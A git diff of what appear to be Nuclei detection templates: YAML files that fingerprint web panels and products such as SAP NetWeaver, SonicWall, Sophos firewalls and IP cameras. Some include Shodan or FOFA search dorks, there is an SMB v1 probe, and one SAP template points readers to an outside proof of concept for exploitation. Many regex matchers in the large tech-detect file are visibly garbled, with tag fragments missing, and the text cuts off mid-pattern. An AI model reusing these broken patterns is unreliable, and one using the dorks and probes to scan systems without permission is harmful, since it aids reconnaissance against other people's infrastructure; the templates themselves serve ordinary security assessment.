b/poc/detect/samsung-printer-detect.yaml @@ -1,32 +1,20 @@ id: samsung-printer-detect - info: - name: Samsung Printer Panel - Detect + name: SAMSUNG Printer Detection author: pussycat0x severity: info - description: Samsung printer panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - fofa-query: app="SAMSUNG-Printer" tags: iot,panel,samsung,printer - -http: + metadata: + fofa-query: 'app="SAMSUNG-Printer"' +requests: - method: GET path: - "{{BaseURL}}/sws/index.html" - matchers-condition: and matchers: - type: word words: - - 'SyncThru Web Service' - + - ' SyncThru Web Service ' - type: status status: - 200 - -# digest: 4a0a0047304502206e15842b403d0c1a0df47a437ec6d65681e28b920c967545d00eacce8be0f48c022100e83c41891a01c670daf11ec2d6fc5443570508d5abcb94d589874676937f826d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/sap-netweaver-detect-10042.yaml b/poc/detect/sap-netweaver-detect-10042.yaml index edbd2eaef5..631dd2667f 100644 --- a/poc/detect/sap-netweaver-detect-10042.yaml +++ b/poc/detect/sap-netweaver-detect-10042.yaml @@ -1,26 +1,13 @@ id: sap-netweaver-detect info: - name: SAP NetWeaver ICM Detection - author: randomstr1ng + name: SAP NetWeaver Detect + author: rakeshmane10 severity: info - description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF) - tags: sap,webserver requests: - method: GET path: - - "{{BaseURL}}" - redirects: true - max-redirects: 2 + - '{{BaseURL}}/irj/portal' matchers: - - type: regex - part: header - regex: - - "sap-server:" - - "Sap-Server:" - - "SAP NetWeaver Application Server" - condition: or - extractors: - - type: kval - part: header - kval: - - "server" + - type: word + words: + - NetWeaver diff --git a/poc/detect/sap-netweaver-detect-10047.yaml b/poc/detect/sap-netweaver-detect-10047.yaml deleted file mode 100644 index 9fe826a6f5..0000000000 --- a/poc/detect/sap-netweaver-detect-10047.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: sap-netweaver-detect - -info: - name: SAP NetWeaver ICM Detection - author: randomstr1ng - description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF) - severity: info - tags: sap,webserver - -requests: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - matchers: - - type: regex - part: header - regex: - - "sap-server:" - - "Sap-Server:" - - "SAP NetWeaver Application Server" - condition: or - - extractors: - - type: kval - part: header - kval: - - "server" diff --git a/poc/detect/sap-recon-detect-10063.yaml b/poc/detect/sap-recon-detect-10063.yaml deleted file mode 100644 index 738d048d1f..0000000000 --- a/poc/detect/sap-recon-detect-10063.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: sap-recon-detect -info: - name: SAP RECON Finder - author: samueladi_ & organiccrap - severity: medium - tags: panel - # Source:- https://github.com/chipik/SAP_RECON - # This is detection template, please use above poc to exploit this further. -requests: - - method: GET - path: - - "{{BaseURL}}/CTCWebService/CTCWebServiceBean" - - "{{BaseURL}}/CTCWebService/CTCWebServiceBean?wsdl" - - "{{BaseURL}}/CTCWebService/Config1?wsdl" - matchers-condition: and - matchers: - - type: word - words: - - Method Not Allowed - - Expected request method POST. Found GET. - - Generated by WSDLDefinitionsParser - - bns0:Config1Binding - - wsdl:definitions - - tns:CTCWebServiceSiBinding - condition: or - - type: status - status: - - 405 - - 200 - condition: or diff --git a/poc/detect/sceditor-detect-10093.yaml b/poc/detect/sceditor-detect-10093.yaml new file mode 100644 index 0000000000..ac205e1bbe --- /dev/null +++ b/poc/detect/sceditor-detect-10093.yaml @@ -0,0 +1,20 @@ +id: sceditor-detect +info: + name: SCEditor Detect + author: pikpikcu + severity: info + tags: tech,sceditor +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - "Ticket BBCode editor - SCEditor" + - 'title="SCEditor"' + condition: and + - type: status + status: + - 200 diff --git a/poc/detect/sceditor-detect-10094.yaml b/poc/detect/sceditor-detect-10094.yaml index d9b323edea..9a760f928e 100644 --- a/poc/detect/sceditor-detect-10094.yaml +++ b/poc/detect/sceditor-detect-10094.yaml @@ -4,9 +4,11 @@ info: name: SCEditor Detect author: pikpikcu severity: info + metadata: + max-request: 1 tags: tech,sceditor -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -18,6 +20,9 @@ requests: - "Ticket BBCode editor - SCEditor" - 'title="SCEditor"' condition: and + - type: status status: - 200 + +# digest: 4a0a00473045022100969eefbde652164896fc0176c36b131fc2cc6f043c9a6dec6251de74293a8309022039d2438182d8e67409001db114578f7b75891f61dbf5d3a6a5c71d84c8a080e0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/secmail-detect-10109.yaml b/poc/detect/secmail-detect-10109.yaml new file mode 100644 index 0000000000..71b8405b65 --- /dev/null +++ b/poc/detect/secmail-detect-10109.yaml @@ -0,0 +1,20 @@ +id: secmail-detect +info: + name: SecMail - secure email Detect + author: johnk3r + severity: info + reference: https://www.shodan.io/search?query=secmail + tags: secmail,panel +requests: + - method: GET + path: + - "{{BaseURL}}/SecMail/login.jsp" + matchers-condition: and + matchers: + - type: word + words: + - "Path=/SecMail" + part: header + - type: status + status: + - 200 diff --git a/poc/detect/secmail-detect-10112.yaml b/poc/detect/secmail-detect-10112.yaml deleted file mode 100644 index 1d505852be..0000000000 --- a/poc/detect/secmail-detect-10112.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: secmail-detect -info: - name: SecMail - secure email Detect - author: johnk3r - severity: info - metadata: - shodan-query: secmail - tags: secmail,panel -requests: - - method: GET - path: - - "{{BaseURL}}/SecMail/login.jsp" - matchers-condition: and - matchers: - - type: word - words: - - "Path=/SecMail" - part: header - - type: status - status: - - 200 diff --git a/poc/detect/securityspy-detect.yaml b/poc/detect/securityspy-detect.yaml index 9200b97b41..76a69cbbc1 100644 --- a/poc/detect/securityspy-detect.yaml +++ b/poc/detect/securityspy-detect.yaml @@ -1,20 +1,14 @@ id: securityspy-detect info: - name: SecuritySpy Camera Panel - Detect + name: SecuritySpy Camera Detect author: pussycat0x - severity: info - description: SecuritySpy Camera panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 + severity: medium metadata: - max-request: 1 - shodan-query: 'title:SecuritySpy' + shodan-dork: 'title:SecuritySpy' tags: unauth,iot,securityspy,panel,camera -http: +requests: - method: GET path: - "{{BaseURL}}" @@ -29,5 +23,3 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022002bd0d27112c5583a1a1e79cb069d61a4a8b5a463ad9a4b3ee26f7023f5cd083022100bdd3b9e86e7f48c1d0605634b208214a6204d9d4da98679ad5b0aaae1f2ffbea:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/seeddms-detect-10129.yaml b/poc/detect/seeddms-detect-10129.yaml index 1c313a8fde..8fe2e10923 100644 --- a/poc/detect/seeddms-detect-10129.yaml +++ b/poc/detect/seeddms-detect-10129.yaml @@ -1,21 +1,21 @@ -id: seeddms-detect -info: - name: Seeddms- - author: pussycat0x - severity: info - tags: tech -requests: - - method: GET - path: - - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - words: - - "SeedDMS: Sign in" - - type: status - status: +id: seeddms-detect +info: + name: Seeddms- + author: pussycat0x + severity: info + tags: tech +requests: + - method: GET + path: + - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - "SeedDMS: Sign in" + - type: status + status: - 200 \ No newline at end of file diff --git a/poc/detect/seeddms-detect-10131.yaml b/poc/detect/seeddms-detect-10131.yaml new file mode 100644 index 0000000000..1c313a8fde --- /dev/null +++ b/poc/detect/seeddms-detect-10131.yaml @@ -0,0 +1,21 @@ +id: seeddms-detect +info: + name: Seeddms- + author: pussycat0x + severity: info + tags: tech +requests: + - method: GET + path: + - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - "SeedDMS: Sign in" + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/detect/server-backup-manager-se-login-detect.yaml b/poc/detect/server-backup-manager-se-login-detect.yaml index 94e05a332f..9e8e641acf 100644 --- a/poc/detect/server-backup-manager-se-login-detect.yaml +++ b/poc/detect/server-backup-manager-se-login-detect.yaml @@ -1,20 +1,33 @@ id: server-backup-manager-se + info: - name: Server Backup Manager SE + name: Server Backup Manager SE Panel - Detect author: dhiyaneshDK severity: info + description: Server Backup Manager SE login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: + max-request: 1 shodan-query: http.title:"Server Backup Manager SE" - tags: panel -requests: + tags: panel,server,backup,manager + +http: - method: GET path: - '{{BaseURL}}/login.zul' + matchers-condition: and matchers: - - type: word - words: - - 'Server Backup Manager SE ' + - type: regex + part: body + regex: + - ".*(Server Backup Manager SE).*" + - type: status status: - 200 + +# Enhanced by md on 2023/01/16 diff --git a/poc/detect/shiro-detect-10195.yaml b/poc/detect/shiro-detect-10195.yaml index 514835edd5..d1b92dd808 100644 --- a/poc/detect/shiro-detect-10195.yaml +++ b/poc/detect/shiro-detect-10195.yaml @@ -1,26 +1,19 @@ id: shiro-detect - info: name: Detect Shiro Framework author: AresX severity: info - metadata: - max-request: 1 tags: tech,shiro - -http: +requests: - method: GET path: - '{{BaseURL}}' - headers: Cookie: JSESSIONID={{randstr}};rememberMe=123; - host-redirects: true + redirects: true max-redirects: 2 matchers: - type: word part: header words: - "rememberMe=deleteMe" - -# digest: 4a0a00473045022100ef5b22652ce1d79a4b00ae2a53eee9f78b2c0042daa5c736c85a1add769cc14602203bfd13125a69cbb3928016a681afc1e1c6eee18343fda64679c693997c0e4860:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/shiro-detect-10196.yaml b/poc/detect/shiro-detect-10196.yaml deleted file mode 100644 index d1b92dd808..0000000000 --- a/poc/detect/shiro-detect-10196.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: shiro-detect -info: - name: Detect Shiro Framework - author: AresX - severity: info - tags: tech,shiro -requests: - - method: GET - path: - - '{{BaseURL}}' - headers: - Cookie: JSESSIONID={{randstr}};rememberMe=123; - redirects: true - max-redirects: 2 - matchers: - - type: word - part: header - words: - - "rememberMe=deleteMe" diff --git a/poc/detect/shopware-detect-10211.yaml b/poc/detect/shopware-detect-10211.yaml deleted file mode 100644 index 290d5bfe2c..0000000000 --- a/poc/detect/shopware-detect-10211.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: shopware-detect -info: - name: Shopware CMS detect - author: cyllective - severity: info - description: Detects Shopware CMS - tags: tech,shopware,cms - reference: - - https://github.com/shopware/shopware - - https://github.com/shopware/platform -requests: - - method: GET - path: - - "{{BaseURL}}/admin" - - "{{BaseURL}}/backend" - matchers: - - type: word - part: body - condition: or - words: - - 'Realisiert mit Shopware' - - 'Realised with Shopware' - - 'Shopware Administration (c) shopware AG' - - 'Shopware 5 - Backend (c) shopware AG' diff --git a/poc/detect/shopware-detect-10212.yaml b/poc/detect/shopware-detect-10212.yaml index 2765f4f1d3..edf59386b6 100644 --- a/poc/detect/shopware-detect-10212.yaml +++ b/poc/detect/shopware-detect-10212.yaml @@ -7,16 +7,12 @@ info: reference: - https://github.com/shopware/shopware - https://github.com/shopware/platform - metadata: - verified: true - shodan-query: title:"shopware AG" tags: tech,shopware,cms requests: - method: GET path: - "{{BaseURL}}/admin" - "{{BaseURL}}/backend" - stop-at-first-match: true matchers-condition: and matchers: - type: word diff --git a/poc/detect/sitemap-detect.yaml b/poc/detect/sitemap-detect.yaml index d7069a6c82..b14ed90663 100644 --- a/poc/detect/sitemap-detect.yaml +++ b/poc/detect/sitemap-detect.yaml @@ -2,17 +2,13 @@ id: sitemap-detect info: name: Sitemap Detection - author: houdinis + author: houdinis,Arqsz severity: info description: | A sitemap is a file where you provide information about the pages, videos, and other files on your site, and the relationships between them. - metadata: - verified: true - max-request: 3 - google-query: intext:"sitemap" filetype:txt,filetype:xml inurl:sitemap,inurl:"/sitemap.xsd" ext:xsd - tags: misc,generic,sitemap + tags: basic,remote,sitemap -http: +requests: - method: GET path: - "{{BaseURL}}/sitemap.xml" @@ -20,21 +16,22 @@ http: - "{{BaseURL}}/sitemap.xsd" stop-at-first-match: true - matchers-condition: and matchers: - type: word words: - - "sitemap>" + - "sitemap" + - "' + +# digest: 4a0a00473045022018a8bf80686d606487628b98a556864708b3e41d09ac2125c7b49dd65a7ce794022100f9709ab85ec5ebe2358b9f3bb10818003a36e06d2e1efcc8639d6f6b1c15df0d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/smartstore-detect.yaml b/poc/detect/smartstore-detect.yaml deleted file mode 100644 index 110fd55841..0000000000 --- a/poc/detect/smartstore-detect.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: smartstore-detect -info: - name: SmartStore Detect - author: princechaddha - severity: info - reference: https://github.com/smartstore/SmartStoreNET - metadata: - shodan-query: http.html:'content="Smartstore' - tags: tech,smartstore,oos -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - '' - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - '' diff --git a/poc/detect/smb-v1-detection-10336.yaml b/poc/detect/smb-v1-detection-10336.yaml index 8326a7cd28..4ff32b9e36 100644 --- a/poc/detect/smb-v1-detection-10336.yaml +++ b/poc/detect/smb-v1-detection-10336.yaml @@ -3,9 +3,8 @@ info: name: SMB-V1 Detection author: pussycat0x severity: low - reference: - - https://stealthbits.com/blog/what-is-smbv1-and-why-you-should-disable-it/ tags: network,windows,smb,service + reference: https://stealthbits.com/blog/what-is-smbv1-and-why-you-should-disable-it/ network: - inputs: - data: 00000031ff534d4272000000001845680000000000000000000000000000be2200000100000e00024e54204c4d20302e3132000200 diff --git a/poc/detect/sonicwall-email-security-detect-10384.yaml b/poc/detect/sonicwall-email-security-detect-10384.yaml new file mode 100644 index 0000000000..5790aa18c4 --- /dev/null +++ b/poc/detect/sonicwall-email-security-detect-10384.yaml @@ -0,0 +1,29 @@ +id: sonicwall-email-security-detect + +info: + name: SonicWall Email Security Panel - Detect + author: gy741 + severity: info + description: SonicWall Email Security panel was detected. + reference: + - https://www.fireeye.com/blog/threat-research/2021/04/zero-day-exploits-in-sonicwall-email-security-lead-to-compromise.html + - https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: tech,panel,sonicwall + +http: + - method: GET + path: + - "{{BaseURL}}/favicon.ico" + + matchers: + - type: dsl + dsl: + - "status_code==200 && (\"2063459123\" == mmh3(base64_py(body)))" + +# digest: 4a0a00473045022100dba93d5edbb4ab30b06e1212e304da9967fe39c322123435e5182abcb2ff93b1022050315db689600caa91fb1b2a4f1c8bd8ebf7cb9638965898fc7280cfdc3dbaeb:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/sonicwall-email-security-detect.yaml b/poc/detect/sonicwall-email-security-detect.yaml deleted file mode 100644 index 13bef24f4c..0000000000 --- a/poc/detect/sonicwall-email-security-detect.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: sonicwall-email-security-detect -info: - name: SonicWall Email Security Detection - author: gy741 - severity: info - reference: - - https://www.fireeye.com/blog/threat-research/2021/04/zero-day-exploits-in-sonicwall-email-security-lead-to-compromise.html - - https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360/ - tags: tech,panel,sonicwall -requests: - - method: GET - path: - - "{{BaseURL}}/favicon.ico" - matchers: - - type: dsl - dsl: - - "status_code==200 && (\"2063459123\" == mmh3(base64_py(body)))" diff --git a/poc/detect/sophos-fw-version-detect-10397.yaml b/poc/detect/sophos-fw-version-detect-10397.yaml index 0b3fc4beb8..a57a47289f 100644 --- a/poc/detect/sophos-fw-version-detect-10397.yaml +++ b/poc/detect/sophos-fw-version-detect-10397.yaml @@ -1,25 +1,46 @@ id: sophos-fw-version-detect + info: - name: Sophos Firewall version detection - author: organiccrap + name: Sophos Firewall Login Panel - Detect + author: organiccrap,daffainfo severity: info + description: Sophos Firewall login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + verified: true + max-request: 2 + shodan-query: title:"Sophos" tags: panel,sophos -requests: + +http: - method: GET path: - "{{BaseURL}}/webconsole/webpages/login.jsp" - "{{BaseURL}}/userportal/webpages/myaccount/login.jsp" + + stop-at-first-match: true + matchers-condition: and matchers: - type: word - words: - - "Sophos" - - type: regex part: body - regex: - - "(\\d{2}.\\d{1,2}.\\d{1,2}.\\d{2,3})" + words: + - 'Sophos' + - 'uiLangToHTMLLangAttributeValueMapping' + condition: or + + - type: status + status: + - 200 + extractors: - type: regex part: body + group: 1 regex: - - "(\\d{2}.\\d{1,2}.\\d{1,2}.\\d{2,3})" + - 'href="\/themes\/lite1\/css\/typography\.css\?version=(([0-9a-z]+)([0-9.]+))' + +# digest: 4a0a00473045022100e719d9d4d187dc31a3205e9addb367e73ea88ae41ba719077c485ab4e8f9d2e102200a2eed57a3a87143354e14cc39d437a0008498f9d734eea5dcfddbe0c8a39143:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/tableau-server-detect-10643.yaml b/poc/detect/tableau-server-detect-10643.yaml new file mode 100644 index 0000000000..0cab5d3164 --- /dev/null +++ b/poc/detect/tableau-server-detect-10643.yaml @@ -0,0 +1,40 @@ +id: tableau-server-detect + +info: + name: Detect Tableau Server + author: TechbrunchFR,aringo + severity: info + description: Detects Tableau Server and extracts the buildid + metadata: + max-request: 1 + tags: tech,tableau + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: or + matchers: + - type: word + part: header + words: + - "X-Tableau: Tableau Server" + - "Server: Tableau" + condition: or + + - type: word + part: body + words: + - "VizPortalRun" + - "vizportal" + condition: or + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'data-build[iI]d="([0-9a-z_]*)' + +# digest: 4a0a00473045022071d557c42ef5b1358fad1342b2a62f8ee6881da2e625cda380610cb0ac5f055e022100842c5e161be3403a54151269cd89e1e9de9c186f5c17e6e4f6e9170159039b1c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/tableau-server-detect.yaml b/poc/detect/tableau-server-detect.yaml deleted file mode 100644 index ac33cb0bcb..0000000000 --- a/poc/detect/tableau-server-detect.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: tableau-server-detect -info: - name: Detect Tableau Server - author: TechbrunchFR - description: Detects Tableau Server and extract the buildId - severity: info - tags: tech,tableau -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: or - matchers: - - type: word - part: header - words: - - "X-Tableau: Tableau Server" - - "Server: Tableau" - condition: or - - type: word - part: body - words: - - "VizPortalRun" - - "vizportal" - condition: or - extractors: - - type: regex - part: body - group: 1 - regex: - - 'data-buildId="([0-9a-z_]*)' diff --git a/poc/detect/tech-detect-10672.yaml b/poc/detect/tech-detect-10672.yaml new file mode 100644 index 0000000000..0f825bbc34 --- /dev/null +++ b/poc/detect/tech-detect-10672.yaml @@ -0,0 +1,2730 @@ +id: tech-detect +info: + name: Wappalyzer Technology Detection + author: hakluke + severity: info + tags: tech +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 2 + matchers-condition: or + matchers: + - type: regex + name: mollom + regex: + - ]+\.mollom\.com + condition: or + part: body + - type: word + name: atlassian-jira + words: + - "Project Management Software" + - "atlassian.com/software/jira" + condition: and + part: body + - type: regex + name: genexus + regex: + - ]+?id="gxtheme_css_reference" + condition: or + part: body + - type: regex + name: flat-ui + regex: + - ]* href=[^>]+flat-ui(?:\.min)?\.css + condition: or + part: body + - type: regex + name: dovetailwrp + regex: + - ]* href="\/DovetailWRP\/ + condition: or + part: body + - type: regex + name: highcharts + regex: + - ]*>Created with Highcharts ([\d.]*) + condition: or + part: body + - type: regex + name: videojs + regex: + - ]+class="video-js+"> + condition: or + part: body + - type: regex + name: tictail + regex: + - ]*tictail\.com + condition: or + part: body + - type: regex + name: wikinggruppen + regex: + - + condition: or + part: body + - type: regex + name: moodle + regex: + - ]+moodlelogo + condition: or + part: body + - type: regex + name: minibb + regex: + - [^<]+\n + condition: or + part: body + - type: regex + name: woocommerce + regex: + - + - + condition: or + part: body + - type: regex + name: youtrack + regex: + - no-title="YouTrack"> + - data-reactid="[^"]+">youTrack ([0-9.]+)< + - type="application/opensearchdescription\+xml" title="YouTrack"/> + condition: or + part: body + - type: regex + name: grandnode + regex: + - "(?: + condition: or + part: body + - type: regex + name: jsdelivr + regex: + - <[^>]+?//cdn\.jsdelivr\.net/ + condition: or + part: body + - type: regex + name: user.com + regex: + - ]+/id="ue_widget" + condition: or + part: body + - type: regex + name: smart-ad-server + regex: + - ]+smartadserver\.com\/call + condition: or + part: body + - type: regex + name: wordpress-super-cache + regex: + - + - ]+(?:typolight|contao)\.css + condition: or + part: body + - type: regex + name: wpcache + regex: + - + condition: or + part: body + - type: regex + name: boldgrid + regex: + - ]+boldgrid + - ]+post-and-page-builder + - ]+s\d+\.boldgrid\.com + condition: or + part: body + - type: regex + name: zurb-foundation + regex: + - ]+foundation[^>"]+css + -
]*class="[^"]*(?:small|medium|large)-\d{1,2} columns + condition: or + part: body + - type: regex + name: shoptet + regex: + - ]*href="https?://cdn\.myshoptet\.com/ + condition: or + part: body + - type: regex + name: phpalbum + regex: + - + condition: or + part: body + - type: regex + name: rbs-change + regex: + - ]+xmlns:change= + condition: or + part: body + - type: regex + name: appnexus + regex: + - <(?:iframe|img)[^>]+adnxs\.(?:net|com) + condition: or + part: body + - type: regex + name: lightbox + regex: + - ]*href="[^"]+lightbox(?:\.min)?\.css + condition: or + part: body + - type: regex + name: shopware + regex: + - Shopware ([\d\.]+) [^<]+ + condition: or + part: body + - type: regex + name: webmine + regex: + - <iframe[^>]+src=[\'"]https://webmine\.cz/miner\?key= + condition: or + part: body + - type: regex + name: fluxbb + regex: + - <p id="poweredby">[^<]+<a href="https?://fluxbb\.org/"> + condition: or + part: body + - type: regex + name: gemius + regex: + - <a [^>]*onclick="gemius_hit + condition: or + part: body + - type: regex + name: sql-buddy + regex: + - (?:<title>SQL Buddy|<[^>]+onclick="sideMainClick\("home\.php) + condition: or + part: body + - type: regex + name: jenkins + regex: + - Jenkins ver\. ([\d.]+) + condition: or + part: body + - type: regex + name: t-soft + regex: + - + condition: or + part: body + - type: regex + name: datocms + regex: + - <[^>]+https://www\.datocms-assets\.com + condition: or + part: body + - type: regex + name: sonarqubes + regex: + - ]*src="[^/]*//[^/]*serving-sys\.com/) + condition: or + part: body + - type: regex + name: koken + regex: + - + - + condition: or + part: body + - type: regex + name: meebo + regex: + - (?: + - + condition: or + part: body + - type: regex + name: a-frame + regex: + - ]*> + condition: or + part: body + - type: regex + name: dreamweaver + regex: + - + - + - ]+_tcm\d{2,3}-\d{6}\. + condition: or + part: body + - type: regex + name: microsoft-publisher + regex: + - (?:]*xmlns:w="urn:schemas-microsoft-com:office:publisher"|\s*<\/div> + condition: or + part: body + - type: regex + name: rebelmouse + regex: + - + condition: or + part: body + - type: regex + name: cargo + regex: + - ]+Cargo feed + condition: or + part: body + - type: regex + name: sentry + regex: + - ']*>\s*Raven\.config\(''[^'']*'', \{\s+release: ''([0-9\.]+)''' + condition: or + part: body + - type: regex + name: visual-website-optimizer + regex: + - + condition: or + part: body + - type: regex + name: twiki + regex: + - ]*(?:title|alt)="This site is powered by the TWiki collaboration platform + condition: or + part: body + - type: regex + name: javadoc + regex: + - + condition: or + part: body + - type: regex + name: tamago + regex: + - ]*href="http://tamago\.temonalab\.com + condition: or + part: body + - type: regex + name: haddock + regex: + -

Produced by Haddock version ([0-9.]+)

+ condition: or + part: body + - type: regex + name: lightmon-engine + regex: + - + condition: or + part: body + - type: regex + name: roundcube + regex: + - RoundCube + condition: or + part: body + - type: regex + name: advanced-web-stats + regex: + - aws\.src = [^<]+caphyon-analytics + condition: or + part: body + - type: regex + name: riskified + regex: + - <[^>]*beacon\.riskified\.com + - <[^>]*c\.riskified\.com + condition: or + part: body + - type: regex + name: dnn + regex: + - <!-- by DotNetNuke Corporation + - <!-- DNN Platform + condition: or + part: body + - type: regex + name: w3-total-cache + regex: + - <!--[^>]+W3 Total Cache + condition: or + part: body + - type: regex + name: tessitura + regex: + - '<!--[^>]+Tessitura Version: (\d*\.\d*\.\d*)?' + condition: or + part: body + - type: regex + name: synology-diskstation + regex: + - <noscript><div class='syno-no-script' + condition: or + part: body + - type: regex + name: whooshkaa + regex: + - <iframe src="[^>]+whooshkaa\.com + condition: or + part: body + - type: regex + name: cubecart + regex: + - (?:Powered by <a href=[^>]+cubecart\.com|<p[^>]+>Powered by CubeCart) + condition: or + part: body + - type: regex + name: powergap + regex: + - <a[^>]+title="POWERGAP + - <input type="hidden" name="shopid" + condition: or + part: body + - type: regex + name: amcharts + regex: + - <svg[^>]*><desc>JavaScript chart by amCharts ([\d.]*) + condition: or + part: body + - type: regex + name: webflow + regex: + - <html[^>]+data-wf-site + condition: or + part: body + - type: regex + name: dokuwiki + regex: + - <div[^>]+id="dokuwiki__> + - <a[^>]+href="#dokuwiki__ + condition: or + part: body + - type: regex + name: jquery-pjax + regex: + - <div[^>]+data-pjax-container + condition: or + part: body + - type: regex + name: phpdocumentor + regex: + - <!-- Generated by phpDocumentor + condition: or + part: body + - type: regex + name: owncloud + regex: + - <a href="https://owncloud\.com" target="_blank">ownCloud Inc\.</a><br/>Your Cloud, Your Data, Your Way! + condition: or + part: body + - type: regex + name: hexo + regex: + - Powered by <a href="https?://hexo\.io/?"[^>]*>Hexo</ + condition: or + part: body + - type: regex + name: atlassian-bitbucket + regex: + - <li>Atlassian Bitbucket <span title="[a-z0-9]+" id="product-version" data-commitid="[a-z0-9]+" data-system-build-number="[a-z0-9]+"> v([\d.]+)< + condition: or + part: body + - type: regex + name: phppgadmin + regex: + - (?:<title>phpPgAdmin|phpPgAdmin) + condition: or + part: body + - type: regex + name: adnegah + regex: + - - - - condition: or - part: body - - type: regex - name: a-frame - regex: - - ]*> - condition: or - part: body - - type: regex - name: dreamweaver - regex: - - - - - - ]+atlassian\.com/(?:software/jira|jira-bug-tracking/)[^>]+>Atlassian\s+JIRA(?:[^v]*v(?:ersion: )?(\d+\.\d+(?:\.\d+)?))?' - condition: or - part: body - - type: regex - name: sdl-tridion - regex: - - ]+_tcm\d{2,3}-\d{6}\. - condition: or - part: body - - type: regex - name: microsoft-publisher - regex: - - (?:]*xmlns:w="urn:schemas-microsoft-com:office:publisher"|\s*<\/div> - condition: or - part: body - - type: regex - name: rebelmouse - regex: - - - condition: or - part: body - - type: regex - name: cargo - regex: - - ]+Cargo feed - condition: or - part: body - - type: regex - name: sentry - regex: - - ']*>\s*Raven\.config\(''[^'']*'', \{\s+release: ''([0-9\.]+)''' - condition: or - part: body - - type: regex - name: visual-website-optimizer - regex: - - - condition: or - part: body - - type: regex - name: twiki - regex: - - ]*(?:title|alt)="This site is powered by the TWiki collaboration platform - condition: or - part: body - - type: regex - name: javadoc - regex: - - - condition: or - part: body - - type: regex - name: tamago - regex: - - ]*href="http://tamago\.temonalab\.com - condition: or - part: body - - type: regex - name: haddock - regex: - -

Produced by Haddock version ([0-9.]+)

- condition: or - part: body - - type: regex - name: lightmon-engine - regex: - - - condition: or - part: body - - type: regex - name: roundcube - regex: - - RoundCube - condition: or - part: body - - type: regex - name: advanced-web-stats - regex: - - aws\.src = [^<]+caphyon-analytics - condition: or - part: body - - type: regex - name: riskified - regex: - - <[^>]*beacon\.riskified\.com - - <[^>]*c\.riskified\.com - condition: or - part: body - - type: regex - name: dnn - regex: - - <!-- by DotNetNuke Corporation - - <!-- DNN Platform - condition: or - part: body - - type: regex - name: w3-total-cache - regex: - - <!--[^>]+W3 Total Cache - condition: or - part: body - - type: regex - name: tessitura - regex: - - '<!--[^>]+Tessitura Version: (\d*\.\d*\.\d*)?' - condition: or - part: body - - type: regex - name: synology-diskstation - regex: - - <noscript><div class='syno-no-script' - condition: or - part: body - - type: regex - name: whooshkaa - regex: - - <iframe src="[^>]+whooshkaa\.com - condition: or - part: body - - type: regex - name: cubecart - regex: - - (?:Powered by <a href=[^>]+cubecart\.com|<p[^>]+>Powered by CubeCart) - condition: or - part: body - - type: regex - name: powergap - regex: - - <a[^>]+title="POWERGAP - - <input type="hidden" name="shopid" - condition: or - part: body - - type: regex - name: amcharts - regex: - - <svg[^>]*><desc>JavaScript chart by amCharts ([\d.]*) - condition: or - part: body - - type: regex - name: webflow - regex: - - <html[^>]+data-wf-site - condition: or - part: body - - type: regex - name: dokuwiki - regex: - - <div[^>]+id="dokuwiki__> - - <a[^>]+href="#dokuwiki__ - condition: or - part: body - - type: regex - name: jquery-pjax - regex: - - <div[^>]+data-pjax-container - condition: or - part: body - - type: regex - name: phpdocumentor - regex: - - <!-- Generated by phpDocumentor - condition: or - part: body - - type: regex - name: owncloud - regex: - - <a href="https://owncloud\.com" target="_blank">ownCloud 